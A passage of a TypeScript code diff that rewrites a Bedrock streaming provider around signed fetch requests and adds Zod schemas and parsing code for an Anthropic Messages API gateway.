false; - - // in Node.js/Bun environment only - if (typeof process !== "undefined" && (process.versions?.node || process.versions?.bun)) { - config.region = config.region || $env.AWS_REGION || $env.AWS_DEFAULT_REGION; - - // Support proxies that don't need authentication - if ($flag("AWS_BEDROCK_SKIP_AUTH")) { - config.credentials = { - accessKeyId: "dummy-access-key", - secretAccessKey: "dummy-secret-key", - }; - } - - if ($flag("AWS_BEDROCK_FORCE_HTTP1") || hasBedrockProxyEnvironment()) { - usesHttp1RequestHandler = true; - installBedrockHttp1Transport(config); - } - } - - config.region = config.region || "us-east-1"; + const region = options.region || $env.AWS_REGION || $env.AWS_DEFAULT_REGION || "us-east-1"; try { const cacheRetention = resolveCacheRetention(options.cacheRetention); - const toolConfig = convertToolConfig(context.tools, options.toolChoice); let additionalModelRequestFields = buildAdditionalModelRequestFields(model, options); @@ -177,87 +182,142 @@ export const streamBedrock: StreamFunction<"bedrock-converse-stream"> = ( // When tool_choice forces tool use, disable thinking to avoid API errors. if (toolConfig?.toolChoice && additionalModelRequestFields) { const tc = toolConfig.toolChoice; - if ("any" in tc || "tool" in tc) { - additionalModelRequestFields = undefined; - } + if (tc.any || tc.tool) additionalModelRequestFields = undefined; } - const commandInput = { - modelId: model.id, + const commandInput: ConverseStreamRequest = { messages: convertMessages(context, model, cacheRetention), system: buildSystemPrompt(context.systemPrompt, model, cacheRetention), - inferenceConfig: { maxTokens: options.maxTokens, temperature: options.temperature, topP: options.topP }, + inferenceConfig: { + maxTokens: options.maxTokens, + temperature: options.temperature, + topP: options.topP, + }, toolConfig, additionalModelRequestFields, }; options?.onPayload?.(commandInput); + + const host = `bedrock-runtime.${region}.amazonaws.com`; + const url = `https://${host}/model/${encodeURIComponent(model.id)}/converse-stream`; + const urlPath = `/model/${encodeURIComponent(model.id)}/converse-stream`; rawRequestDump = { provider: model.provider, api: output.api, model: model.id, method: "POST", - url: `https://bedrock-runtime.${config.region}.amazonaws.com/model/${model.id}/converse-stream`, + url, body: commandInput, }; - while (true) { - const client = new BedrockRuntimeClient(config); - try { - const command = new ConverseStreamCommand(commandInput); - const response = await client.send(command, { abortSignal: options.signal }); + let credentials: { accessKeyId: string; secretAccessKey: string; sessionToken?: string }; + if ($flag("AWS_BEDROCK_SKIP_AUTH")) { + credentials = { accessKeyId: "dummy-access-key", secretAccessKey: "dummy-secret-key" }; + } else { + credentials = await resolveAwsCredentials({ + profile: options.profile, + region, + signal: options.signal, + }); + } - for await (const item of response.stream!) { - if (item.messageStart) { - messageStarted = true; - if (item.messageStart.role !== ConversationRole.ASSISTANT) { - throw new Error("Unexpected assistant message start but got user message start instead"); - } - stream.push({ type: "start", partial: output }); - } else if (item.contentBlockStart) { - if (!firstTokenTime) firstTokenTime = Date.now(); - handleContentBlockStart(item.contentBlockStart, blocks, output, stream); - } else if (item.contentBlockDelta) { - if (!firstTokenTime) firstTokenTime = Date.now(); - handleContentBlockDelta(item.contentBlockDelta, blocks, output, stream); - } else if (item.contentBlockStop) { - handleContentBlockStop(item.contentBlockStop, blocks, output, stream); - } else if (item.messageStop) { - output.stopReason = mapStopReason(item.messageStop.stopReason); - } else if (item.metadata) { - handleMetadata(item.metadata, model, output); - } else if (item.internalServerException) { - throw new Error(`Internal server error: ${item.internalServerException.message}`); - } else if (item.modelStreamErrorException) { - throw new Error(`Model stream error: ${item.modelStreamErrorException.message}`); - } else if (item.validationException) { - throw withHttpStatus(new Error(`Validation error: ${item.validationException.message}`), 400); - } else if (item.throttlingException) { - throw new Error(`Throttling error: ${item.throttlingException.message}`); - } else if (item.serviceUnavailableException) { - throw new Error(`Service unavailable: ${item.serviceUnavailableException.message}`); + const bodyText = JSON.stringify(commandInput); + const body = new TextEncoder().encode(bodyText); + const baseHeaders: Record<string, string> = { + "content-type": "application/json", + accept: "application/vnd.amazon.eventstream", + }; + const signed = await signRequest({ + method: "POST", + host, + path: urlPath, + body, + region, + service: "bedrock", + credentials, + headers: baseHeaders, + }); + const requestHeaders: Record<string, string> = { ...baseHeaders, ...signed }; + + const response = await fetchWithRetry(url, { + method: "POST", + headers: requestHeaders, + body, + signal: options.signal, + }); + + if (!response.ok) { + const errBody = await response.text().catch(() => ""); + throw withHttpStatus( + new Error(`Bedrock HTTP ${response.status}: ${errBody.slice(0, 1000)}`), + response.status, + ); + } + if (!response.body) throw new Error("Bedrock response has no body"); + + // Track first event for the abort/diagnostic path (currently informational). + for await (const message of decodeEventStream(response.body)) { + const messageType = message.headers[":message-type"]; + const eventType = message.headers[":event-type"]; + + if (messageType === "exception") { + const exceptionType = message.headers[":exception-type"] || "Exception"; + const payload = safeParsePayload(message.payload) as { message?: string } | undefined; + const errorMessage = payload?.message || new TextDecoder().decode(message.payload); + const status = exceptionType === "validationException" ? 400 : 0; + const err = new Error(`${exceptionType}: ${errorMessage}`); + throw status ? withHttpStatus(err, status) : err; + } + if (messageType === "error") { + const code = message.headers[":error-code"] || "UnknownError"; + const errorMessage = message.headers[":error-message"] || new TextDecoder().decode(message.payload); + throw new Error(`${code}: ${errorMessage}`); + } + if (messageType !== "event") continue; + + const payload = safeParsePayload(message.payload); + if (!payload) continue; + + switch (eventType) { + case "messageStart": { + // no-op: first event marker is implicit by stream entry. + const ev = payload as MessageStartEvent; + if (ev.role !== "assistant") { + throw new Error("Unexpected assistant message start but got user message start instead"); } + stream.push({ type: "start", partial: output }); + break; } - break; - } catch (error) { - if ( - !usesHttp1RequestHandler && - !messageStarted && - output.content.length === 0 && - isHttp2ResponseError(error) - ) { - usesHttp1RequestHandler = true; - installBedrockHttp1Transport(config); - continue; + case "contentBlockStart": { + if (!firstTokenTime) firstTokenTime = Date.now(); + handleContentBlockStart(payload as ContentBlockStartEvent, blocks, output, stream); + break; } - throw error; - } finally { - client.destroy(); + case "contentBlockDelta": { + if (!firstTokenTime) firstTokenTime = Date.now(); + handleContentBlockDelta(payload as ContentBlockDeltaEvent, blocks, output, stream); + break; + } + case "contentBlockStop": { + handleContentBlockStop(payload as ContentBlockStopEvent, blocks, output, stream); + break; + } + case "messageStop": { + const ev = payload as MessageStopEvent; + output.stopReason = mapStopReason(ev.stopReason); + break; + } + case "metadata": { + handleMetadata(payload as MetadataEvent, model, output); + break; + } + default: + // Unknown event types (Bedrock may add new ones) — ignore. + break; } } - if (options.signal?.aborted) { - throw new Error("Request was aborted"); - } + if (options.signal?.aborted) throw new Error("Request was aborted"); if (output.stopReason === "error" || output.stopReason === "aborted") { throw new Error(output.errorMessage ?? "An unknown error occurred"); @@ -305,13 +365,22 @@ export const streamBedrock: StreamFunction<"bedrock-converse-stream"> = ( return stream; }; +function safeParsePayload(payload: Uint8Array): unknown { + if (payload.length === 0) return {}; + try { + return JSON.parse(new TextDecoder().decode(payload)); + } catch { + return undefined; + } +} + function handleContentBlockStart( event: ContentBlockStartEvent, blocks: Block[], output: AssistantMessage, stream: AssistantMessageEventStream, ): void { - const index = event.contentBlockIndex!; + const index = event.contentBlockIndex; const start = event.start; if (start?.toolUse) { @@ -334,13 +403,13 @@ function handleContentBlockDelta( output: AssistantMessage, stream: AssistantMessageEventStream, ): void { - const contentBlockIndex = event.contentBlockIndex!; + const contentBlockIndex = event.contentBlockIndex; const delta = event.delta; let index = blocks.findIndex(b => b.index === contentBlockIndex); let block = blocks[index]; if (delta?.text !== undefined) { - // If no text block exists yet, create one, as `handleContentBlockStart` is not sent for text blocks + // If no text block exists yet, create one — `handleContentBlockStart` is not sent for text blocks if (!block) { const newBlock: Block = { type: "text", text: "", index: contentBlockIndex }; output.content.push(newBlock); @@ -386,11 +455,7 @@ function handleContentBlockDelta( } } -function handleMetadata( - event: ConverseStreamMetadataEvent, - model: Model<"bedrock-converse-stream">, - output: AssistantMessage, -): void { +function handleMetadata(event: MetadataEvent, model: Model<"bedrock-converse-stream">, output: AssistantMessage): void { if (event.usage) { output.usage.input = event.usage.inputTokens || 0; output.usage.output = event.usage.outputTokens || 0; @@ -468,16 +533,16 @@ function buildSystemPrompt( systemPrompt: readonly string[] | undefined, model: Model<"bedrock-converse-stream">, cacheRetention: CacheRetention, -): SystemContentBlock[] | undefined { +): SystemContent[] | undefined { const prompts = systemPrompt?.map(prompt => prompt.toWellFormed()).filter(prompt => prompt.length > 0) ?? []; if (prompts.length === 0) return undefined; - const blocks: SystemContentBlock[] = prompts.map(prompt => ({ text: prompt })); + const blocks: SystemContent[] = prompts.map(prompt => ({ text: prompt })); // Add cache point for supported Claude models if (cacheRetention !== "none" && supportsPromptCaching(model)) { blocks.push({ - cachePoint: { type: CachePointType.DEFAULT, ...(cacheRetention === "long" ? { ttl: CacheTTL.ONE_HOUR } : {}) }, + cachePoint: { type: "default", ...(cacheRetention === "long" ? { ttl: "1h" } : {}) }, }); } @@ -488,8 +553,8 @@ function convertMessages( context: Context, model: Model<"bedrock-converse-stream">, cacheRetention: CacheRetention, -): Message[] { - const result: Message[] = []; +): WireMessage[] { + const result: WireMessage[] = []; const transformedMessages = transformMessages(context.messages, model, normalizeToolCallId); for (let i = 0; i < transformedMessages.length; i++) { @@ -501,44 +566,34 @@ function convertMessages( if (typeof m.content === "string") { // Skip empty user messages if (!m.content || m.content.trim() === "") continue; - result.push({ - role: ConversationRole.USER, - content: [{ text: m.content.toWellFormed() }], - }); + result.push({ role: "user", content: [{ text: m.content.toWellFormed() }] }); } else { - const contentBlocks = m.content - .map(c => { - switch (c.type) { - case "text": - return { text: c.text.toWellFormed() }; - case "image": - return { image: createImageBlock(c.mimeType, c.data) }; - default: - throw new Error("Unknown user content type"); + const contentBlocks: UserContent[] = []; + for (const c of m.content) { + switch (c.type) { + case "text": { + const text = c.text.toWellFormed(); + if (text.trim().length === 0) continue; + contentBlocks.push({ text }); + break; } - }) - .filter(block => { - // Filter out empty text blocks - if ("text" in block && block.text) { - return block.text.trim().length > 0; - } - return true; // Keep non-text blocks (images) - }); + case "image": + contentBlocks.push({ image: createImageBlock(c.mimeType, c.data) }); + break; + default: + throw new Error("Unknown user content type"); + } + } // Skip message if all blocks filtered out if (contentBlocks.length === 0) continue; - result.push({ - role: ConversationRole.USER, - content: contentBlocks, - }); + result.push({ role: "user", content: contentBlocks }); } break; case "assistant": { // Skip assistant messages with empty content (e.g., from aborted requests) // Bedrock rejects messages with empty content arrays - if (m.content.length === 0) { - continue; - } - const contentBlocks: ContentBlock[] = []; + if (m.content.length === 0) continue; + const contentBlocks: AssistantContent[] = []; for (const c of m.content) { switch (c.type) { case "text": @@ -570,9 +625,7 @@ function convertMessages( } else if (!supportsThinkingSignature(model)) { // Model doesn't support signatures at all — send as unsigned reasoning contentBlocks.push({ - reasoningContent: { - reasoningText: { text: c.thinking.toWellFormed() }, - }, + reasoningContent: { reasoningText: { text: c.thinking.toWellFormed() } }, }); } else { // Model requires signature but we don't have one — demote to text @@ -584,21 +637,14 @@ function convertMessages( } } // Skip if all content blocks were filtered out - if (contentBlocks.length === 0) { - continue; - } - result.push({ - role: ConversationRole.ASSISTANT, - content: contentBlocks, - }); + if (contentBlocks.length === 0) continue; + result.push({ role: "assistant", content: contentBlocks }); break; } case "toolResult": { - // Collect all consecutive toolResult messages into a single user message - // Bedrock requires all tool results to be in one message - const toolResults: ContentBlock.ToolResultMember[] = []; - - // Add current tool result with all content blocks combined + // Collect all consecutive toolResult messages into a single user message — + // Bedrock requires all tool results to be in one message. + const toolResults: ToolResultBlockWire[] = []; toolResults.push({ toolResult: { toolUseId: normalizeToolCallId(m.toolCallId), @@ -607,11 +653,10 @@ function convertMessages( ? { image: createImageBlock(c.mimeType, c.data) } : { text: c.text.toWellFormed() }, ), - status: m.isError ? ToolResultStatus.ERROR : ToolResultStatus.SUCCESS, + status: m.isError ? "error" : "success", }, }); - // Look ahead for consecutive toolResult messages let j = i + 1; while (j < transformedMessages.length && transformedMessages[j].role === "toolResult") { const nextMsg = transformedMessages[j] as ToolResultMessage; @@ -623,19 +668,14 @@ function convertMessages( ? { image: createImageBlock(c.mimeType, c.data) } : { text: c.text.toWellFormed() }, ), - status: nextMsg.isError ? ToolResultStatus.ERROR : ToolResultStatus.SUCCESS, + status: nextMsg.isError ? "error" : "success", }, }); j++; } - - // Skip the messages we've already processed i = j - 1; - result.push({ - role: ConversationRole.USER, - content: toolResults, - }); + result.push({ role: "user", content: toolResults }); break; } default: @@ -646,12 +686,9 @@ function convertMessages( // Add cache point to the last user message for supported Claude models if (cacheRetention !== "none" && supportsPromptCaching(model) && result.length > 0) { const lastMessage = result[result.length - 1]; - if (lastMessage.role === ConversationRole.USER && lastMessage.content) { - (lastMessage.content as ContentBlock[]).push({ - cachePoint: { - type: CachePointType.DEFAULT, - ...(cacheRetention === "long" ? { ttl: CacheTTL.ONE_HOUR } : {}), - }, + if (lastMessage.role === "user" && lastMessage.content) { + (lastMessage.content as UserContent[]).push({ + cachePoint: { type: "default", ...(cacheRetention === "long" ? { ttl: "1h" } : {}) }, }); } } @@ -662,23 +699,18 @@ function convertMessages( function convertToolConfig( tools: Tool[] | undefined, toolChoice: BedrockOptions["toolChoice"], -): ToolConfiguration | undefined { +): WireToolConfig | undefined { if (!tools?.length || toolChoice === "none") return undefined; - const bedrockTools: BedrockTool[] = tools.map(tool => ({ + const bedrockTools: WireToolSpec[] = tools.map(tool => ({ toolSpec: { name: tool.name, description: tool.description || "", - // Wire schema is structurally a JSON Schema document; the Bedrock SDK - // types it as the recursive `DocumentType` from `@smithy/types`, which - // `Record<string, unknown>` does not directly satisfy at the type - // level. Cast through `unknown` so the actual JSON value passes the - // type checker without changing runtime behavior. - inputSchema: { json: toolWireSchema(tool) as unknown as Record<string, never> }, + inputSchema: { json: toolWireSchema(tool) }, }, })); - let bedrockToolChoice: ToolChoice | undefined; + let bedrockToolChoice: WireToolChoice | undefined; switch (toolChoice) { case "auto": bedrockToolChoice = { auto: {} }; @@ -697,13 +729,13 @@ function convertToolConfig( function mapStopReason(reason: string | undefined): StopReason { switch (reason) { - case BedrockStopReason.END_TURN: - case BedrockStopReason.STOP_SEQUENCE: + case "end_turn": + case "stop_sequence": return "stop"; - case BedrockStopReason.MAX_TOKENS: - case BedrockStopReason.MODEL_CONTEXT_WINDOW_EXCEEDED: + case "max_tokens": + case "model_context_window_exceeded": return "length"; - case BedrockStopReason.TOOL_USE: + case "tool_use": return "toolUse"; default: return "error"; @@ -713,11 +745,9 @@ function mapStopReason(reason: string | undefined): StopReason { function buildAdditionalModelRequestFields( model: Model<"bedrock-converse-stream">, options: BedrockOptions, -): Record<string, any> | undefined { +): Record<string, unknown> | undefined { const reasoning = options.reasoning; - if (!reasoning || !model.reasoning) { - return undefined; - } + if (!reasoning || !model.reasoning) return undefined; const mode = model.thinking?.mode; if (mode === "anthropic-adaptive") { @@ -738,11 +768,8 @@ function buildAdditionalModelRequestFields( }; const budget = options.thinkingBudgets?.[level] ?? defaultBudgets[level]; - const result: Record<string, any> = { - thinking: { - type: "enabled", - budget_tokens: budget, - }, + const result: Record<string, unknown> = { + thinking: { type: "enabled", budget_tokens: budget }, }; if (options.interleavedThinking) { @@ -752,31 +779,28 @@ function buildAdditionalModelRequestFields( return result; } -function createImageBlock(mimeType: string, data: string) { - let format: ImageFormat; +/** + * Bedrock's wire format expects the image as `{ source: { bytes: <base64-string> }, format }`. + * The caller already passes base64-encoded data, so no decode/re-encode round-trip is needed. + */ +function createImageBlock(mimeType: string, data: string): ImageBlockWire["image"] { + let format: "jpeg" | "png" | "gif" | "webp"; switch (mimeType) { case "image/jpeg": case "image/jpg": - format = ImageFormat.JPEG; + format = "jpeg"; break; case "image/png": - format = ImageFormat.PNG; + format = "png"; break; case "image/gif": - format = ImageFormat.GIF; + format = "gif"; break; case "image/webp": - format = ImageFormat.WEBP; + format = "webp"; break; default: throw new Error(`Unknown image type: ${mimeType}`); } - - const binaryString = atob(data); - const bytes = new Uint8Array(binaryString.length); - for (let i = 0; i < binaryString.length; i++) { - bytes[i] = binaryString.charCodeAt(i); - } - - return { source: { bytes }, format }; + return { source: { bytes: data }, format }; } diff --git a/packages/ai/src/providers/anthropic-messages-server-schema.ts b/packages/ai/src/providers/anthropic-messages-server-schema.ts new file mode 100644 index 000000000..09ab75283 --- /dev/null +++ b/packages/ai/src/providers/anthropic-messages-server-schema.ts @@ -0,0 +1,229 @@ +/** + * Zod schemas for the Anthropic Messages API request shape we accept on the + * gateway. Mirrors https://docs.anthropic.com/en/api/messages — only the + * shapes the gateway actually understands; unsupported fields are caught with + * `.refine(...)` so the error mentions them explicitly. + * + * Used by `anthropic-messages.ts:parseRequest` to validate the inbound JSON + * before walking it into pi-ai's canonical `Context`. + */ +import type { + ContentBlockParam, + ImageBlockParam, + MessageCreateParams, + MessageParam, + TextBlockParam, + Tool, + ToolChoice, +} from "@anthropic-ai/sdk/resources/messages"; +import * as z from "zod/v4"; + +// `cache_control` is accepted and translated to pi-ai's per-request +// `cacheRetention` (any `ttl: "1h"` marker upgrades the request to "long"; +// any other ephemeral marker maps to "short"). The walker doesn't try to +// preserve per-block breakpoints — pi-ai's anthropic provider re-applies them +// against the rebuilt outbound request anyway. +export const cacheControlSchema = z + .object({ + type: z.literal("ephemeral"), + ttl: z.union([z.literal("1h"), z.literal("5m")]).optional(), + }) + .loose(); + +// ─── Sources / inner shapes ───────────────────────────────────────────────── + +export const base64ImageSourceSchema = z.object({ + type: z.literal("base64"), + data: z.string().min(1), + media_type: z.string().min(1), +}); + +export const urlImageSourceSchema = z.object({ + type: z.literal("url"), + url: z.url(), +}); + +export const fileImageSourceSchema = z.object({ + type: z.literal("file"), + file_id: z.string().min(1), +}); + +export const imageSourceSchema = z.discriminatedUnion("type", [ + base64ImageSourceSchema, + urlImageSourceSchema, + fileImageSourceSchema, +]); + +const textBlockSchema = z.object({ + type: z.literal("text"), + text: z.string(), + cache_control: cacheControlSchema.optional(), +}); + +const imageBlockSchema = z.object({ + type: z.literal("image"), + source: imageSourceSchema, + cache_control: cacheControlSchema.optional(), +}); + +const thinkingBlockSchema = z.object({ + type: z.literal("thinking"), + thinking: z.string(), + signature: z.string().optional(), + cache_control: cacheControlSchema.optional(), +}); + +const redactedThinkingBlockSchema = z.object({ + type: z.literal("redacted_thinking"), + data: z.string(), + cache_control: cacheControlSchema.optional(), +}); + +const toolUseBlockSchema = z.object({ + type: z.literal("tool_use"), + id: z.string().min(1), + name: z.string().min(1), + input: z.record(z.string(), z.unknown()).optional(), + cache_control: cacheControlSchema.optional(), +}); + +const toolResultContentBlockSchema = z.discriminatedUnion("type", [textBlockSchema, imageBlockSchema]); + +const toolResultBlockSchema = z.object({ + type: z.literal("tool_result"), + tool_use_id: z.string().min(1), + content: z.union([z.string(), z.array(toolResultContentBlockSchema)]).optional(), + is_error: z.boolean().optional(), + cache_control: cacheControlSchema.optional(), +}); + +// Catch-all for content block variants Anthropic ships that the gateway doesn't +// natively understand (server_tool_use, web_search_tool_result, mcp_*, +// container_upload, code_execution_*, document, …). The walker flattens these +// to a text placeholder so legitimate Anthropic clients don't get rejected. +const unknownContentBlockSchema = z.object({ type: z.string() }).loose(); + +// ─── System ──────────────────────────────────────────────────────────────── + +const systemBlockSchema = z.object({ + type: z.literal("text"), + text: z.string(), + cache_control: cacheControlSchema.optional(), +}); + +export const systemSchema = z.union([z.string(), z.array(systemBlockSchema)]).optional(); + +// ─── Messages ────────────────────────────────────────────────────────────── + +const userContentBlockSchema = z.union([ + z.discriminatedUnion("type", [textBlockSchema, imageBlockSchema, toolResultBlockSchema]), + unknownContentBlockSchema, +]); + +const assistantContentBlockSchema = z.union([ + z.discriminatedUnion("type", [ + textBlockSchema, + thinkingBlockSchema, + redactedThinkingBlockSchema, + toolUseBlockSchema, + ]), + unknownContentBlockSchema, +]); + +export const userMessageSchema = z.object({ + role: z.literal("user"), + content: z.union([z.string(), z.array(userContentBlockSchema)]), +}); + +export const assistantMessageSchema = z.object({ + role: z.literal("assistant"), + content: z.union([z.string(), z.array(assistantContentBlockSchema)]), +}); + +export const messageSchema = z.discriminatedUnion("role", [userMessageSchema, assistantMessageSchema]); + +// ─── Tools ───────────────────────────────────────────────────────────────── + +export const toolSchema = z.object({ + name: z.string().min(1), + description: z.string().optional(), + input_schema: z.record(z.string(), z.unknown()), + cache_control: cacheControlSchema.optional(), +}); + +// ─── Tool choice ─────────────────────────────────────────────────────────── + +// `disable_parallel_tool_use` is accepted on every variant; the walker maps it +// onto `options.parallelToolCalls = !disable_parallel_tool_use`. +export const toolChoiceSchema = z.discriminatedUnion("type", [ + z.object({ type: z.literal("auto"), disable_parallel_tool_use: z.boolean().optional() }), + z.object({ type: z.literal("any"), disable_parallel_tool_use: z.boolean().optional() }), + z.object({ type: z.literal("none"), disable_parallel_tool_use: z.boolean().optional() }), + z.object({ + type: z.literal("tool"), + name: z.string().min(1), + disable_parallel_tool_use: z.boolean().optional(), + }), +]); + +// ─── Thinking ────────────────────────────────────────────────────────────── + +// Anthropic's three thinking shapes. `enabled` requires a budget; `disabled` +// suppresses reasoning even on models that default it on; `adaptive` lets the +// provider pick the budget on the fly. Extra hints (`display: "omitted"`, …) +// are accepted but ignored on the translate path. +export const thinkingConfigSchema = z.discriminatedUnion("type", [ + z.object({ + type: z.literal("enabled"), + budget_tokens: z.number(), + display: z.unknown().optional(), + }), + z.object({ + type: z.literal("disabled"), + display: z.unknown().optional(), + }), + z.object({ + type: z.literal("adaptive"), + budget_tokens: z.number().optional(), + display: z.unknown().optional(), + }), +]); + +// ─── Top-level request ───────────────────────────────────────────────────── + +export const anthropicMessagesRequestSchema = z.object({ + model: z.string().min(1), + messages: z.array(messageSchema), + max_tokens: z.number(), + system: systemSchema, + tools: z.array(toolSchema).optional(), + tool_choice: toolChoiceSchema.optional(), + temperature: z.number().optional(), + top_p: z.number().optional(), + top_k: z.number().optional(), + stop_sequences: z.array(z.string()).optional(), + stream: z.boolean().optional(), + thinking: thinkingConfigSchema.optional(), + // Anthropic clients commonly send `metadata: { user_id }`; the walker + // surfaces it on `options.metadata` for downstream provider forwarding. + metadata: z.record(z.string(), z.unknown()).optional(), + // Spec fields that the gateway tolerates but doesn't translate yet. + container: z.unknown().optional(), + context_management: z.unknown().optional(), + mcp_servers: z.unknown().optional(), + service_tier: z.unknown().optional(), +}); + +/** + * Public types are sourced from the upstream Anthropic SDK so the gateway + * stays in lock-step with the canonical API surface; the schemas above are + * runtime validators for the subset we actually accept. + */ +export type AnthropicMessagesRequest = MessageCreateParams; +export type AnthropicSystem = MessageCreateParams["system"]; +export type AnthropicMessage = MessageParam; +export type AnthropicUserContentBlock = ContentBlockParam; +export type AnthropicAssistantContentBlock = ContentBlockParam; +export type AnthropicTool = Tool; +export type AnthropicToolChoice = ToolChoice; +export type AnthropicToolResultContent = TextBlockParam | ImageBlockParam; diff --git a/packages/ai/src/providers/anthropic-messages-server.ts b/packages/ai/src/providers/anthropic-messages-server.ts new file mode 100644 index 000000000..e0aeb19be --- /dev/null +++ b/packages/ai/src/providers/anthropic-messages-server.ts @@ -0,0 +1,677 @@ +import { logger } from "@oh-my-pi/pi-utils"; +import { captureRequestHeaders, resolvePromptCacheKey } from "../auth-gateway/http"; +import type { + AssistantMessage, + AssistantMessageEventStream, + Message, + RedactedThinkingContent, + StopReason, + TextContent, + ThinkingContent, + Tool, + ToolCall, + ToolResultMessage, + UserMessage, +} from "../types"; +import { + type AnthropicAssistantContentBlock, + type AnthropicMessage, + type AnthropicSystem, + type AnthropicTool, + type AnthropicToolChoice, + type AnthropicToolResultContent, + type AnthropicUserContentBlock, + anthropicMessagesRequestSchema, +} from "./anthropic-messages-server-schema"; + +/** + * Anthropic Messages API (https://docs.anthropic.com/en/api/messages) ↔ pi-ai + * gateway translation. Inbound: foreign HTTP body → omp Context. Outbound: + * omp AssistantMessage[Stream] → Anthropic-shaped JSON / SSE. + */ + +import type { AuthGatewayParsedRequest as ParsedRequest } from "../auth-gateway/types"; + +export type { ParsedRequest }; + +// --------------------------------------------------------------------------- +// Inbound parsing +// --------------------------------------------------------------------------- + +type ImageContentPart = { type: "image"; data: string; mimeType: string }; + +// Dedup noise from unknown-block-type warnings. Module-scoped so the warn +// fires once per (category, type) pair across the lifetime of the process. +const WARNED_UNKNOWN_BLOCK_TYPES = new Set<string>(); +function warnUnknownBlockType(category: "user" | "assistant", blockType: string): void { + const key = `${category}:${blockType}`; + if (WARNED_UNKNOWN_BLOCK_TYPES.has(key)) return; + WARNED_UNKNOWN_BLOCK_TYPES.add(key); + logger.warn("anthropic-messages: unknown content block flattened to text placeholder", { + category, + blockType, + }); +} + +// pi-ai's `ImageContent` only carries base64 + mimeType. When the inbound +// uses `url` or `file_id` sources we surface a text placeholder so the +// downstream provider still sees a sane history; warn once per source kind. +const WARNED_NON_BASE64_IMAGE_SOURCES = new Set<string>(); +function warnNonBase64ImageSource(sourceType: string): void { + if (WARNED_NON_BASE64_IMAGE_SOURCES.has(sourceType)) return; + WARNED_NON_BASE64_IMAGE_SOURCES.add(sourceType); + logger.warn("anthropic-messages: image source surfaced as text placeholder (pi-ai ImageContent lacks URL channel)", { + sourceType, + }); +} + +// Compact, log-safe stringification for unknown content blocks. Keeps the +// placeholder informative without dumping multi-KB structures into history. +function describeUnknownBlock(block: { type: string }): string { + try { + const json = JSON.stringify(block); + if (json !== undefined && json.length <= 200) return `[${block.type}: ${json}]`; + } catch { + // fall through + } + return `[${block.type}]`; +} + +function buildSystemPrompt(raw: AnthropicSystem): string[] | undefined { + if (raw === undefined) return undefined; + if (typeof raw === "string") return raw.length > 0 ? [raw] : undefined; + const parts = raw.map(block => block.text).filter(text => text.length > 0); + return parts.length > 0 ? [parts.join("\n\n")] : undefined; +} + +function makeUserMessage(parts: (TextContent | ImageContentPart)[], timestamp: number): UserMessage { + return { + role: "user", + content: parts.length === 1 && parts[0].type === "text" ? parts[0].text : parts, + timestamp, + }; +} + +function toolResultPartsFromBlocks( + content: AnthropicToolResultContent[] | string | undefined, +): (TextContent | ImageContentPart)[] { + if (content === undefined) return []; + if (typeof content === "string") return [{ type: "text", text: content }]; + const out: (TextContent | ImageContentPart)[] = []; + for (const block of content) { + if (block.type === "text") { + out.push({ type: "text", text: block.text }); + continue; + } + // block.type === "image" — schema only accepts base64 sources. + if (block.source.type === "base64") { + out.push({ type: "image", data: block.source.data, mimeType: block.source.media_type }); + } + } + return out; +} + +function walkUserContent( + blocks: string | AnthropicUserContentBlock[], + timestamp: number, +): (UserMessage | ToolResultMessage)[] { + const messages: (UserMessage | ToolResultMessage)[] = []; + const userParts: (TextContent | ImageContentPart)[] = []; + const flush = () => { + if (userParts.length === 0) return; + messages.push(makeUserMessage(userParts.splice(0), timestamp)); + }; + if (typeof blocks === "string") { + if (blocks.length > 0) userParts.push({ type: "text", text: blocks }); + flush(); + return messages; + } + for (const block of blocks) { + if (block.type === "text") { + userParts.push({ type: "text", text: block.text }); + } else if (block.type === "image") { + // SDK's typed source covers base64+url; our schema also accepts the + // forward-compat `file` variant. Narrow against a widened shape so + // every variant is handled at runtime regardless of SDK lag. + const source = block.source as { + type: string; + data?: string; + media_type?: string; + url?: string; + file_id?: string; + }; + if (source.type === "base64" && source.data && source.media_type) { + userParts.push({ type: "image", data: source.data, mimeType: source.media_type }); + } else { + warnNonBase64ImageSource(source.type); + const ref = + source.type === "url" ? (source.url ?? "") : source.type === "file" ? (source.file_id ?? "") : ""; + userParts.push({ type: "text", text: `[image: ${ref}]` }); + } + } else if (block.type === "tool_result") { + // Anthropic permits tool_result blocks to follow plain text/image + // siblings in the same user message. pi-ai's history is a flat + // sequence of typed messages, so flush the accumulated parts as a + // separate UserMessage before emitting the ToolResultMessage. + flush(); + messages.push({ + role: "toolResult", + toolCallId: block.tool_use_id, + // Anthropic tool_results don't carry the tool name; downstream can rehydrate. + toolName: "", + content: toolResultPartsFromBlocks(block.content as AnthropicToolResultContent[] | string | undefined), + isError: block.is_error === true, + timestamp, + }); + } else { + // Unknown variant (server_tool_use, mcp_*, document, web_search_tool_result, + // container_upload, code_execution_*, …). Flatten to a text placeholder + // so the downstream provider still gets a coherent transcript. + const unknown = block as { type: string }; + warnUnknownBlockType("user", unknown.type); + userParts.push({ type: "text", text: describeUnknownBlock(unknown) }); + } + } + flush(); + return messages; +} + +function walkAssistantContent( + blocks: string | AnthropicAssistantContentBlock[], +): (TextContent | ThinkingContent | RedactedThinkingContent | ToolCall)[] { + const out: (TextContent | ThinkingContent | RedactedThinkingContent | ToolCall)[] = []; + if (typeof blocks === "string") { + if (blocks.length > 0) out.push({ type: "text", text: blocks }); + return out; + } + for (const block of blocks) { + switch (block.type) { + case "text": + out.push({ type: "text", text: block.text }); + break; + case "thinking": { + const tc: ThinkingContent = { type: "thinking", thinking: block.thinking }; + if (block.signature !== undefined) tc.thinkingSignature = block.signature; + out.push(tc); + break; + } + case "redacted_thinking": + out.push({ type: "redactedThinking", data: block.data }); + break; + case "tool_use": + out.push({ + type: "toolCall", + id: block.id, + name: block.name, + arguments: block.input ?? {}, + }); + break; + default: { + // Unknown assistant variant (server_tool_use, mcp_tool_use, …). + // Flatten to a text placeholder; warn once per unknown type. + const unknown = block as { type: string }; + warnUnknownBlockType("assistant", unknown.type); + out.push({ type: "text", text: describeUnknownBlock(unknown) }); + break; + } + } + } + return out; +} + +function walkTools(tools: AnthropicTool[] | undefined): Tool[] | undefined { + if (!tools) return undefined; + return tools.map(tool => ({ + name: tool.name, + description: tool.description ?? "", + parameters: tool.input_schema as Record<string, unknown>, + })); +} + +function mapToolChoice(choice: AnthropicToolChoice | undefined): ParsedRequest["options"]["toolChoice"] { + if (!choice) return undefined; + switch (choice.type) { + case "auto": + return "auto"; + case "any": + return "required"; + case "none": + return "none"; + case "tool": + return { name: choice.name }; + } +} + +type AnthropicCacheControl = { type: "ephemeral"; ttl?: "1h" | "5m" }; +type 